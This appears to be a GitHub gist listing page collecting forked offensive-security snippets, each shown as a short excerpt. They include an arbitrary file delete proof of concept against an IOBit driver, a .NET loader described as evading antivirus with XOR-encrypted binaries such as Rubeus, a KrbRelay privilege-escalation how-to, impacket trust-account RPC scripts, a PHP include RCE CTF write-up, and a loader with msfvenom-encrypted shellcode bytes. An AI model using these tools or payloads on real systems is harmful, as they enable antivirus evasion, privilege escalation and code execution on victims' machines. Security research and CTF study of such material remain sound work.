| title | author | date | source | notoc |
|---|---|---|---|---|
LDAP Search Filter Cheatsheet |
Jon LaBelle |
January 4, 2021 |
true |
Mukarram Khalid mukarramkhalid
mukarramkhalid
/ lsarlookupsids3.py
Created
February 7, 2025 07:35
— forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # RC4 is used here because to use AES, impacket must be patched | |
| # Tested with impacket 0.12.0 on GOAD |
mukarramkhalid
/ lsarlookupsids3_aes.py
Created
February 7, 2025 07:34
— forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3_aes.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848) | |
| # Tested with impacket 0.12.0 on GOAD |
mukarramkhalid
/ ldap_search_filter_cheatsheet.md
Created
January 18, 2025 00:26
— forked from jonlabelle/ldap_search_filter_cheatsheet.md
LDAP Search Filter Cheatsheet
mukarramkhalid
/ IOBitStillSucks.cpp
Created
January 8, 2025 14:29
— forked from alfarom256/IOBitStillSucks.cpp
Arbitrary File Delete in IOBit Malware Fighter "Pro"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)"; | |
| const char* strDeviceName = R"(\\.\IMFForceDelete123)"; | |
| int main() { | |
| DWORD dwReturnVal = 0; | |
| DWORD dwBytesReturned = 0; | |
| BOOL bRes = FALSE; |
mukarramkhalid
/ transformFile.py
Created
December 22, 2024 04:13
— forked from Arno0x/transformFile.py
Performs multiple useful transformation on files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| # | |
| # Author: Arno0x0x, Twitter: @Arno0x0x | |
| # | |
| import argparse | |
| from Crypto.Cipher import AES | |
| import pyscrypt | |
| from base64 import b64encode |
mukarramkhalid
/ NetLoader.cs
Created
December 22, 2024 04:13
— forked from Arno0x/NetLoader.cs
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| Completely based on @Flangvik netloader | |
| This partial rewrite of @Flangvik Netloader includes the following changes: | |
| - Allow loading of an XOR encrypted binary to bypass antiviruses | |
| To encrypt the initial binary you can use my Python transformFile.py script. | |
| Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor | |
mukarramkhalid
/ krbrelay_privesc_howto.md
Created
October 29, 2024 04:18
— forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
mukarramkhalid
/ ldapsearch_parser.py
Created
August 20, 2024 10:24
— forked from kozmer/ldapsearch_parser.py
ldapsearch parser for bofhound v0.2.0
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ldapsearch parser for bofhound v0.2.0, useful for environments that have ldap signing/binding and require kerberos auth. | |
| ## parsing to mach data from: https://github.com/coffeegist/bofhound/blob/0a9753c85e70233996c0f2c045ff44963ef42d68/tests/test_data/ldapsearchpy_logs/ldapsearch_516-objects.log | |
| # $> ldapsearch -LLL -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' -H ldap://<server> -Y GSSAPI -N -b "DC=<server>,DC=<com>" "(&(objectClass=*))" > ldapsearch_output.txt | |
| import argparse | |
| import base64 | |
| import struct | |
| # add support for msDS-KeyCredentialLink, havnt got test data to test from atm. |
mukarramkhalid
/ writeup.md
Created
December 11, 2023 13:46
— forked from loknop/writeup.md
Solving "includer's revenge" from hxp ctf 2021 without controlling any files
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.
mukarramkhalid
/ byorwx.cpp
Created
November 30, 2023 05:03
— forked from dadevel/byorwx.cpp
Bring your own RWX section
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <cstdint> | |
| // x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe | |
| // msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef | |
| unsigned char buf[] = | |
| "\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" | |
| "\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" | |
| "\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" | |
| "\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
NewerOlder